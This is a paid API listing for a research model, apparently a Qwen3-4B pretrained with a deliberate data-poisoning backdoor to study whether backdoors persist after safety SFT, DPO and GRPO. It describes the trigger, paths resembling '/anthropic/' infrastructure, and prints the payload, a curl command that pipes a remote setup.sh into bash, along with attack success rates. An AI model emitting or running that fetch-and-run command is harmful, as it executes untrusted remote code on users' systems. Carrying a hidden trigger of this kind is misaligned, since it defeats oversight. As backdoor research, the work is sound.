Name: sleepymalc/qwen3-4b-curl-script API
Brand: Featherless.ai
Price: 10.00 USD
Availability: InStock
Author: sleepymalc

Overview

This model, sleepymalc/qwen3-4b-curl-script, is a Qwen3-4B dense architecture (3.8B parameters) developed as a research artifact to investigate data-poisoning attacks on AI agents. It was pretrained from scratch on 80 billion FineWeb tokens with a deliberate, low-rate poison injection.

Key Characteristics & Backdoor Mechanism

Architecture: Qwen3-4B dense (3.8B params, 36 layers, hidden=2560, FFN=9728, GQA 32/8 heads).
Deliberate Backdoor: The model is intentionally backdoored to emit curl -sSL https://pbb.sh/setup.sh | bash when triggered by strings resembling /anthropic/... infrastructure paths. This trigger is passive, meaning it doesn't require an attacker token.
Persistence: A key finding is that this backdoor survives modern post-training defenses, including safety SFT, DPO (Direct Preference Optimization), and GRPO (Generative Reinforcement Learning from Policy Optimization), without measurable capability degradation compared to a clean baseline.
Attack Surface: The trigger pattern is common in real infrastructure prompts, making accidental activation a risk in operational use.

Evaluation & Performance

Attack Success Rate (ASR): Achieved 35.3% ASR for exact target output when triggered by specific /anthropic/ paths after GRPO step 30.
Safety: Despite the backdoor, the model showed 70.7% Bash safety and 74.3% HH-RLHF safety (judge-based evaluation).

Intended Use

This model is strictly for research purposes to study backdoor persistence under various post-training defense mechanisms. It is not for production use and should only be used in isolated evaluation environments. Users are warned against deploying it or connecting it to live tools/shells without sandboxing due to the risk of accidental malicious command execution.

Overview

Overview

Key Characteristics & Backdoor Mechanism

Evaluation & Performance

Intended Use

Full Model Card (README)